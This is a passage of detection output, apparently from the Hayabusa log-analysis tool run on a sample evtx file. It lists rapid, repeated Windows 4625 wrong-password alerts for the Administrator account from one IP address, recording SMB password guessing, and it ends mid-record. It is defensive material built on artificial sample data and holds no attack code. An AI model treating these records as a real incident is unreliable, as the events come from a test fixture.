+2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wObt647cIBPiVaZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nYDe1L7NNxDGQ0Vt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXroClxv7B0aCTYv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kCVah2QOH1hMSV76 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2HjD65Xy4Hppim2l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwmEQxC4iTcF4aFu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q3QxOH7ok8RR068t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJFj6Ckw1HdK9w52 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qqu3Im4HXQNyGnYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bk5dmjQDnpSlREum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pk4BvYgXBR2whf80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6n1su2TUr7ONQr4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: givsEAGfG0smN9Re : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i2YuM0i7a2QuY7xb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xuocQPZpd91adY0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PvGB1dZrfDWyZoqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4oi8iL88rJo7g2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3OUnytXi4NjvqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WKkJcp3TYj31iJUM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0E44RVqAE1feU0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny5LCb1qOIUhxOPY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9jcDgzzqH26DjQ1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yil94cFkU6UP24SK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkdVHF3vggCcuNdn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dRRI2CS3aVIX4nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: chDZq3VgxIE2mRb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HLVvgMmqLXKZADON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i4avO2AJSlNb0IUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mdo5CvycGvGhn33y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heJfjLl1vbX6lMjZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOP1E6hd4Jtj4gob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xa7kMCNz0bEGTBqX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSxTQ4HsZt2DeYVe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxHpSQwFSV4hveVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n3OwzSPomxZLoCe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e9IfwDZIfYT6A50K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOf6DbRX4zlNqLdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00kXrnJNH40NyoYL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nsNHcb9pnpdRgeL7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucMhgxMXy9Ch1jNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cfi3ZaLTECJgjM9x : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: usugjEEBHlhJvOyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQ1pM2CVLt5ITVD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NIboW7hNljF3HPpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOk5W4rkSYRRw4xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJTfcwd8rnFc06iF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sm415W5zkvjdnTV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KEiSbtlmW4ou1mc7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xWeZV5pHt94adwUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5np7HeCPAFTDdTXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gXbe2jEJVtwaQXlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hZFiUCJnaBdHcw4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a71wyo41KV1ZoT7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogB17WdeOiC19rqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ANOLPWG12lkW39Ei : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y1vf7OUxb6TH3Q4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxU5yumSieUzSgzH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9K5EoWWASU8SlSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PwZLRPFxaFWwjZEe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8fXgFFb3HTMunsoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R1RozAr1uhux4cYW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7EmuUSv03RnhKsF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jw410HEW8EC3MC9f : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTYp8cEbt3Yggo3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWJVzgYLWIo7SGCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DP13jPdW5Gdl8z56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LNXOWjHmMDhfFVon : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kka1RiF3f7Nhkf8x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2o90lG6attzWU4ZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PyPK9kuJdflQ4RKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a9I3El7d7anR0kIz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDUMTEfNhFuuqMle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e0F70d1WstkqnQgA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bm0txApQSp1U42N3 : IP Address: 192.168.198.149 : AuthPackage: 
